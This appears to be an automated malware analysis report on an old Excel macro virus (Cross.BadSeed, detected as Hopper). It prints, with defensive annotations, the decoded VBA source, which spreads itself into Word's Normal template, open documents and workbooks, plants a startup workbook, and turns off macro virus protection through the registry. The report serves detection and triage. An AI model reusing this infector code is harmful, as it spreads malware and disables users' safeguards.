Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 95f8bb8620578e03…

MALICIOUS

Office (OLE)

23.0 KB Created: 1998-12-08 08:08:44 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 393f22b89c16d3d59c8048893cf43638 SHA-1: 083a935bfa63d73f2cbc295a43a6872053640f90 SHA-256: 95f8bb8620578e03386fc5b8aa6de94ac6484563bd6bf0cad8dcf236aa7883bf
220 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1546.003 Event Triggered Execution: Windows Management Instrumentation

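This Excel file contains VBA macros that attempt to infect other documents and potentially establish persistence. The macros use CreateObject and GetObject calls, which are common in malicious Office documents; in the extracted source they are used to automate Word and Excel ("Word.Application", "Excel.Application"). The ClamAV detection 'Doc.Trojan.Hopper-6' further indicates malicious intent. The script attempts to infect the NormalTemplate and ActiveDocument and, when no 'Book1.' file is found there, creates a new workbook named 'Book1.' in the Excel startup path. It also sets Options.VirusProtection = False in Word and blanks the Excel 'Options6' registry value through a generated routine named DisableAV. No WMI use is visible in the extracted preview (which is truncated), so the T1546.003 mapping should be confirmed against the full macro source.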

Heuristics 4

  • ClamAV: Doc.Trojan.Hopper-6 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Hopper-6
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5305 bytes
SHA-256: 261dfa0c080923ca70557079becba7f288227d481f182f9b46db56d8688fb187
Detection
ClamAV: Doc.Trojan.Hopper-6
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'<!--1nternal-->
'Cross.BadSeed v0.3 /1nternal
' Analyst note: the '<!--1nternal--> comment above is the exact string every
' routine below compares against line 1 of a code module to decide whether that
' module already holds this code. It is a stable string to match on when
' scanning extracted macro source. The second comment is the name/version
' banner that the MsgBox calls below also display.
'
' Module-level flag. Workbook_Deactivate tests it and sets it to True before it
' creates and saves a workbook; presumably a guard against the handler running
' again while that work is in progress (it is never reset in the visible code).
Private InRoutine As Boolean
' Word-side handler: cross-copies the first 90 lines of macro code between the
' Normal template and the active document whenever either lacks the marker line.
' Analyst note: Document_Close is a Word document event name. This listing was
' extracted from an Excel ThisWorkbook module, so this routine presumably only
' runs once the same lines have been copied into a Word ThisDocument module.
Private Sub Document_Close()
    ' Errors are suppressed for the whole routine, so failed steps are silent.
    On Error Resume Next
    ' Turns off the "save changes to Normal template" prompt, so a modified
    ' template is saved without asking the user.
    Options.SaveNormalPrompt = False
    Options.ConfirmConversions = False
    ' Turns off Word's built-in macro virus protection setting. Defensive
    ' relevance: this option being off on a host is worth checking during triage.
    Options.VirusProtection = False
    ' NT = code module of the Normal template, AD = code module of the document
    ' being closed.
    Set NT = NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule
    Set AD = ActiveDocument.VBProject.VBComponents("ThisDocument").CodeModule
    ' Marker check on the Normal template: if line 1 is not the marker, the
    ' template's existing code is deleted and replaced with lines 1-90 of the
    ' active document's module.
    If NT.Lines(1, 1) <> "'<!--1nternal-->" Then
        NT.DeleteLines 1, NT.CountOfLines
        For i = 1 To 90
            NT.InsertLines i, AD.Lines(i, 1)
        Next
    Else
        ' Template already carries the marker: hand over to the Excel-side routine.
        Call WackExcel
    End If
    ' Same check in the other direction: an unmarked active document has its
    ' code deleted and replaced with lines 1-90 of the Normal template's module.
    If AD.Lines(1, 1) <> "'<!--1nternal-->" Then
        AD.DeleteLines 1, AD.CountOfLines
        For i = 1 To 90
            AD.InsertLines i, NT.Lines(i, 1)
        Next
    End If
    ' Visible side effect: on the 15th of a month, with a 1-in-15 random chance,
    ' a message box with the banner text is shown.
    If Day(Now) = 15 And (Int((15 * Rnd) + 1) = 1) Then
        MsgBox ("Cross.BadSeed v0.3 /1nternal")
    End If
End Sub
' Excel-side handler, run when the workbook loses focus: ensures a marked
' "Book1." workbook exists in the Excel startup path, calls the Word-side
' routine, then applies InfectBook to every open workbook.
' Defensive relevance: an unexpected Book1 file in the Excel startup folder is a
' host indicator for this family. Excel opens files from that folder at launch,
' so this is how the macro code comes back after a restart.
Private Sub Workbook_Deactivate()
    ' Errors are suppressed for the whole routine.
    On Error Resume Next
    ' Runs only when no "Book1." file is found in the startup path and the
    ' InRoutine flag has not been set yet.
    If UCase(Dir(Application.StartupPath + "\Book1.")) <> "BOOK1" And InRoutine <> True Then
        InRoutine = True
        ' Word is handled first (see WackWord).
        Call WackWord
        ' A new workbook is saved into the startup path without being added to
        ' the recently-used list (AddToMru:=False), then marked and closed.
        Workbooks.Add.SaveAs FileName:=Application.StartupPath & "\Book1.", FileFormat:=xlNormal, AddToMru:=False
        InfectBook ("Book1.")
        Workbooks("Book1.").Close SaveChanges:=True
    End If
    ' Every workbook currently open in this Excel instance is passed to InfectBook.
    For i = 1 To Workbooks.Count
        InfectBook (i)
    Next
    ' Visible side effect: on the 1st of a month, with a 1-in-15 random chance,
    ' a message box with the banner text is shown.
    If Day(Now) = 1 And (Int((15 * Rnd) + 1) = 1) Then
        MsgBox ("Cross.BadSeed v0.3 /1nternal")
    End If
End Sub
' Copies lines 1-90 of this workbook's ThisWorkbook module into the
' ThisWorkbook module of the workbook identified by Booknum (an index or a
' name; both forms are used by the caller), unless line 1 of the target is
' already the marker.
' Analyst note: unlike the Word-side routines, the target's existing lines are
' not deleted first; the copied lines are inserted at positions 1-90 ahead of
' whatever code was there. This routine sets no error handler of its own.
Private Sub InfectBook(Booknum)
        ' Marker check: skip workbooks whose first module line is the marker.
        If Workbooks(Booknum).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(1, 1) <> "'<!--1nternal-->" Then
            For y = 1 To 90
                Workbooks(Booknum).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.InsertLines y, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(y, 1)
            Next
        End If
End Sub
' Excel-to-Word step: obtains a Word automation object and, if Word's Normal
' template does not start with the marker, replaces the template's ThisDocument
' code with lines 1-90 of this workbook's module.
' Before copying, it writes and runs a temporary four-line sub in the template
' that blanks the Excel "Options6" registry value.
' Defensive relevance: these are the GetObject/CreateObject calls behind the
' OLE_VBA_GETOBJ / OLE_VBA_CREATEOBJ findings. Host indicators are a modified
' Normal template and an empty Options6 value under the two Office\8.0 keys
' written below.
Private Sub WackWord()
    ' Errors are suppressed for the whole routine.
    On Error Resume Next
    ' Try to attach to an already running Word instance.
    Set WordObj = GetObject(, "Word.Application")
    ' NOTE(review): comparing an object reference with "" depends on the
    ' On Error Resume Next above; how this branch evaluates when Word is already
    ' running is not clear from the listing alone. Confirm dynamically if needed.
    If WordObj = "" Then
        ' Start a new Word instance and remember to close it afterwards
        ' (Quit is used here as a local flag variable).
        Set WordObj = CreateObject("Word.Application")
        Quit = True
    End If
    Set NT = WordObj.NormalTemplate.VBProject.VBComponents("ThisDocument").CodeModule
    ' Marker check on Word's Normal template.
    If NT.Lines(1, 1) <> "'<!--1nternal-->" Then
        ' Suppress the "save changes to Normal template" prompt in Word.
        WordObj.Options.SaveNormalPrompt = False
        NT.DeleteLines 1, NT.CountOfLines
        ' Build a temporary sub named DisableAV inside the template. It uses
        ' System.PrivateProfileString to set the "Options6" value to an empty
        ' string under the HKCU Excel key and the HKLM "New User Settings" Excel
        ' key for Office 8.0. Chr(34) is the double-quote character.
        ' Options6 presumably holds Excel's macro virus protection setting,
        ' as the generated sub's name suggests - TODO confirm.
        NT.InsertLines 1, "Public Sub DisableAV()"
        NT.InsertLines 2, " System.PrivateProfileString(" + Chr(34) + Chr(34) + ", " + Chr(34) + "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel" + Chr(34) + ", " + Chr(34) + "Options6" + Chr(34) + ") = " + Chr(34) + Chr(34)
        NT.InsertLines 3, " System.PrivateProfileString(" + Chr(34) + Chr(34) + ", " + Chr(34) + "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Excel" + Chr(34) + ", " + Chr(34) + "Options6" + Chr(34) + ") = " + Chr(34) + Chr(34)
        NT.InsertLines 4, "End Sub"
        ' The temporary sub is executed inside Word, then removed again by the
        ' DeleteLines call that follows.
        WordObj.Run "Normal.ThisDocument.DisableAV"
        NT.DeleteLines 1, NT.CountOfLines
        ' Copy lines 1-90 of this workbook's module into the now empty template.
        For i = 1 To 90
            NT.InsertLines i, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(i, 1)
        Next
    End If
    Set NT = Nothing
    ' Close Word only if this routine started it.
    If Quit = True Then WordObj.Quit
End Sub
Private Sub WackExcel()
    On Error Resume Next
    Set xlApp = CreateObject("Excel.Application")
    If UCase(Dir(xlApp.Application.StartupPath + "\Book1.")) <> UCase("BOOK1") Then
        On Error Resume Next
        System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = ""
        System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\8.0\New User Settings\Excel\Microsoft Exce
... (truncated)